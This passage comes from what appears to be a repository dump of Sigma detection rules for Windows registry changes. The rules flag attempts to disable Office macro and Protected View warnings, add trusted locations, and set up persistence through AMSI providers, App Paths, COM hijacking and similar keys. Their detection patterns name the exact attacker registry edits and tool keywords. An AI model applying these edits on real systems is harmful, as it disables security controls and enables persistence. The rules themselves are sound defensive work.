    "content": "title: Trust Access Disable For VBApplications\nid: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf\nrelated:\n    - id: 9b894e57-033f-46cf-b7fa-a52804181973\n      type: obsolete\nstatus: test\ndescription: Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Security\\AccessVBOM'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml",
    "content": "title: Microsoft Office Protected View Disabled\nid: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc\nrelated:\n    - id: 7c637634-c95d-4bbf-b26c-a82510874b34\n      type: obsolete\nstatus: test\ndescription: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n    - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\n    - https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-06-08\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_path:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Security\\ProtectedView\\'\n    selection_values_1:\n        Details: 'DWORD (0x00000001)'\n        TargetObject|endswith:\n            - '\\DisableAttachementsInPV' # Turn off Protected View for attachments opened from Outlook\n            - '\\DisableInternetFilesInPV' # Turn off Protected View for files downloaded from Internet zone\n            - '\\DisableIntranetCheck' # Turn off Protected View for file located in UNC paths\n            - '\\DisableUnsafeLocationsInPV' # Turn off Protected View for unsafe locations\n    selection_values_0:\n        Details: 'DWORD (0x00000000)'\n        TargetObject|endswith:\n            - '\\enabledatabasefileprotectedview'\n            - '\\enableforeigntextfileprotectedview'\n    condition: selection_path and 1 of selection_values_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml",
    "content": "title: Python Function Execution Security Warning Disabled In Excel - Registry\nid: 17e53739-a1fc-4a62-b1b9-87711c2d5e44\nrelated:\n    - id: 023c654f-8f16-44d9-bb2b-00ff36a62af9\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\n    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\nreferences:\n    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327\nauthor: Nasreddine Bencherchali (Nextron Systems), @Kostastsale\ndate: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Office\\'\n        TargetObject|endswith: '\\Excel\\Security\\PythonFunctionWarnings'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_enable_dde.yml",
    "content": "title: Enable Microsoft Dynamic Data Exchange\nid: 63647769-326d-4dde-a419-b925cc0caf42\nstatus: test\ndescription: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021\nauthor: frack113\ndate: 2022-02-26\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1559.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_word:\n        TargetObject|endswith: '\\Word\\Security\\AllowDDE'\n        Details:\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000002)'\n    selection_excel:\n        TargetObject|endswith:\n            - '\\Excel\\Security\\DisableDDEServerLaunch'\n            - '\\Excel\\Security\\DisableDDEServerLookup'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml",
    "content": "title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting\nid: 396ae3eb-4174-4b9b-880e-dc0364d78a19\nstatus: test\ndescription: Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\n    - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-04-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\LoadMacroProviderOnBoot'\n        Details|contains: '0x00000001'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml",
    "content": "title: Outlook Macro Execution Without Warning Setting Enabled\nid: e3b50fa5-3c3f-444e-937b-0a99d33731cd\nstatus: test\ndescription: Detects the modification of Outlook security setting to allow unprompted execution of macros.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\nauthor: '@ScoubiMtl'\ndate: 2021-04-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\Security\\Level'\n        Details|contains: '0x00000001' # Enable all Macros\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml",
    "content": "title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry\nid: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08\nrelated:\n    - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a\n      type: similar\n    - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation\n      type: similar\nstatus: test\ndescription: Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros\nreferences:\n    - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\Security\\EnableUnsafeClientMailRules'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml",
    "content": "title: Outlook Security Settings Updated - Registry\nid: c3cefdf4-6703-4e1c-bad8-bf422fc5015a\nrelated:\n    - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # EnableUnsafeClientMailRules\n      type: similar\nstatus: test\ndescription: Detects changes to the registry values related to outlook security settings\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md\n    - https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings\nauthor: frack113\ndate: 2021-12-28\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Outlook\\Security\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml",
    "content": "title: Macro Enabled In A Potentially Suspicious Document\nid: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd\nrelated:\n    - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2\n      type: derived\nstatus: test\ndescription: Detects registry changes to Office trust records where the path is located in a potentially suspicious location\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_value:\n        TargetObject|contains: '\\Security\\Trusted Documents\\TrustRecords'\n    selection_paths:\n        TargetObject|contains:\n            # Note: add more locations where you don't expect a user to executed macro enabled docs\n            - '/AppData/Local/Microsoft/Windows/INetCache/'\n            - '/AppData/Local/Temp/'\n            - '/PerfLogs/'\n            - 'C:/Users/Public/'\n            - 'file:///D:/'\n            - 'file:///E:/'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml",
    "content": "title: Uncommon Microsoft Office Trusted Location Added\nid: f742bde7-9528-42e5-bd82-84f51a8387d2\nrelated:\n    - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac\n      type: derived\nstatus: test\ndescription: Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.\nreferences:\n    - Internal Research\n    - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-09-29\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Security\\Trusted Locations\\Location'\n        TargetObject|endswith: '\\Path'\n    filter_exclude_known_paths:\n        Details|contains:\n            - '%APPDATA%\\Microsoft\\Templates'\n            - '%%APPDATA%%\\Microsoft\\Templates'\n            - '%APPDATA%\\Microsoft\\Word\\Startup'\n            - '%%APPDATA%%\\Microsoft\\Word\\Startup'\n            - ':\\Program Files (x86)\\Microsoft Office\\root\\Templates\\'\n            - ':\\Program Files\\Microsoft Office (x86)\\Templates'\n            - ':\\Program Files\\Microsoft Office\\root\\Templates\\'\n            - ':\\Program Files\\Microsoft Office\\Templates\\'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_exclude_*\nfalsepositives:\n    - Other unknown legitimate or custom paths need to be filtered to avoid false positives\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml",
    "content": "title: Office Macros Warning Disabled\nid: 91239011-fe3c-4b54-9f24-15c86bb65913\nrelated:\n    - id: 9b894e57-033f-46cf-b7fa-a52804181973\n      type: obsolete\nstatus: test\ndescription: Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-22\nmodified: 2024-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Security\\VBAWarnings'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml",
    "content": "title: MaxMpxCt Registry Value Changed\nid: 0e6a9e62-627e-496c-aef5-bfa39da29b5e\nstatus: test\ndescription: |\n    Detects changes to the \"MaxMpxCt\" registry value.\n    MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.\n    Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.\nreferences:\n    - https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\n    - https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware\n    - https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1\n    - https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Services\\LanmanServer\\Parameters\\MaxMpxCt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml",
    "content": "title: Potential Persistence Via New AMSI Providers - Registry\nid: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705\nstatus: test\ndescription: |\n    Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.\n    Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.\n    This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.\nreferences:\n    - https://persistence-info.github.io/Data/amsi.html\n    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2025-10-26\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\AMSI\\Providers\\'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'\n    filter_optional_avira:\n        Image: 'C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n        TargetObject|contains: '\\{00000001-3DCC-4B48-A82E-E2071FE58E05}'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate security products adding their own AMSI providers. Filter these according to your environment.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml",
    "content": "title: Potential Persistence Via AppCompat RegisterAppRestart Layer\nid: b86852fb-4c77-48f9-8519-eb1b2c308b59\nstatus: test\ndescription: |\n    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\n    This compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\n    This can be potentially abused as a persistence mechanism.\nreferences:\n    - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers\\'\n        Details|contains: 'REGISTERAPPRESTART'\n    condition: selection\nfalsepositives:\n    - Legitimate applications making use of this feature for compatibility reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml",
    "content": "title: Potential Persistence Via App Paths Default Property\nid: 707e097c-e20f-4f67-8807-1f72ff4500d6\nstatus: test\ndescription: |\n    Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\n    The entries found under App Paths are used primarily for the following purposes.\n    First, to map an application's executable file name to that file's fully qualified path.\n    Second, to prepend information to the PATH environment variable on a per-application, per-process basis.\nreferences:\n    - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n    - https://learn.microsoft.com/en-us/windows/win32/shell/app-registration\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'\n        TargetObject|endswith:\n            - '(Default)'\n            - 'Path'\n        Details|contains:\n            # Add more suspicious paths or binaries as you see fit.\n            - '\\Users\\Public'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '%temp%'\n            - '%tmp%'\n            - 'iex'\n            - 'Invoke-'\n            - 'rundll32'\n            - 'regsvr32'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - '.bat'\n            - '.hta'\n            - '.dll'\n            - '.ps1'\n    condition: selection\nfalsepositives:\n    - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml",
    "content": "title: Potential Persistence Using DebugPath\nid: df4dc653-1029-47ba-8231-3c44238cc0ae\nstatus: test\ndescription: Detects potential persistence using Appx DebugPath\nreferences:\n    - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\n    - https://github.com/rootm0s/WinPwnage\nauthor: frack113\ndate: 2022-07-27\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_debug:\n        TargetObject|contains: 'Classes\\ActivatableClasses\\Package\\Microsoft.'\n        TargetObject|endswith: '\\DebugPath'\n    selection_default:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.'\n        TargetObject|endswith: '\\(Default)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml",
    "content": "title: Potential Persistence Via AutodialDLL\nid: e6fe26ee-d063-4f5b-b007-39e90aaf50e3\nstatus: test\ndescription: Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library\nreferences:\n    - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/\n    - https://persistence-info.github.io/Data/autodialdll.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\WinSock2\\Parameters\\AutodialDLL'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_chm.yml",
    "content": "title: Potential Persistence Via CHM Helper DLL\nid: 976dd1f2-a484-45ec-aa1d-0e87e882262b\nstatus: test\ndescription: Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence\nreferences:\n    - https://persistence-info.github.io/Data/htmlhelpauthor.html\n    - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\HtmlHelp Author\\Location'\n            - '\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml",
    "content": "title: COM Object Hijacking Via Modification Of Default System CLSID Default Value\nid: 790317c0-0a36-4a6a-a105-6e576bf99a14\nrelated:\n    - id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77\n      type: obsolete\n    - id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\n      type: obsolete\nstatus: experimental\ndescription: Detects potential COM object hijacking via modification of default system CLSID.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\n    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\n    - https://blog.talosintelligence.com/uat-5647-romcom/\n    - https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques\n    - https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea\n    - https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis\n    - https://github.com/rtecCyberSec/BitlockMove\n    - https://cert.gov.ua/article/6284080\n    - https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-16\nmodified: 2025-11-10\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target_root:\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith:\n            - '\\InprocServer32\\(Default)'\n            - '\\LocalServer32\\(Default)'\n    selection_target_builtin_clsid:\n        TargetObject|contains:\n            # Note: Add other legitimate CLSID\n            - '\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\\'\n            - '\\{2155fee3-2419-4373-b102-6843707eb41f}\\'\n            - '\\{4590f811-1d3a-11d0-891f-00aa004b2e24}\\'\n            - '\\{4de225bf-cf59-4cfc-85f7-68b90f185355}\\'\n            - '\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\\'\n            - '\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\'\n            - '\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\\'\n            - '\\{7849596a-48ea-486e-8937-a2a3009f31a9}\\'\n            - '\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}\\'\n            - '\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\'\n            - '\\{30D49246-D217-465F-B00B-AC9DDD652EB7}\\'\n            - '\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\\'\n            - '\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n            - '\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\\'\n            - '\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}\\'\n    selection_susp_location_1:\n        Details|contains:\n            # Note: Add more suspicious paths and locations\n            - ':\\Perflogs\\'\n            - '\\AppData\\Local\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\System32\\spool\\drivers\\color\\' # as seen in the knotweed blog\n            - '\\Temporary Internet'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '%appdata%'\n            - '%temp%'\n            - '%tmp%'\n    selection_susp_location_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: all of selection_target_* and 1 of selection_susp_location_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml",
    "content": "title: Potential COM Object Hijacking Via TreatAs Subkey - Registry\nid: 9b0f8a61-91b2-464f-aceb-0527e0a45020\nstatus: test\ndescription: Detects COM object hijacking via TreatAs subkey\nreferences:\n    - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nauthor: Kutepov Anton, oscd.community\ndate: 2019-10-23\nmodified: 2025-10-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - 'HKU\\'\n            - 'Classes\\CLSID\\'\n            - '\\TreatAs'\n    filter_main_svchost:\n        # Example of target object by svchost\n        # TargetObject: HKU\\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\n        Image: 'C:\\WINDOWS\\system32\\svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Maybe some system utilities in rare cases use linking keys for backward compatibility\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: COM hijacking via TreatAs\n      technique: T1546.015\n      atomic_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml",
    "content": "title: Potential PSFactoryBuffer COM Hijacking\nid: 243380fa-11eb-4141-af92-e14925e77c1b\nstatus: test\ndescription: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.\nreferences:\n    - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine\n    - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html\n    - https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection\n    - https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html\nauthor: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk\ndate: 2023-06-07\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)'\n    filter_main:\n        Details:\n            - '%windir%\\System32\\ActXPrxy.dll'\n            - 'C:\\Windows\\System32\\ActXPrxy.dll'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml",
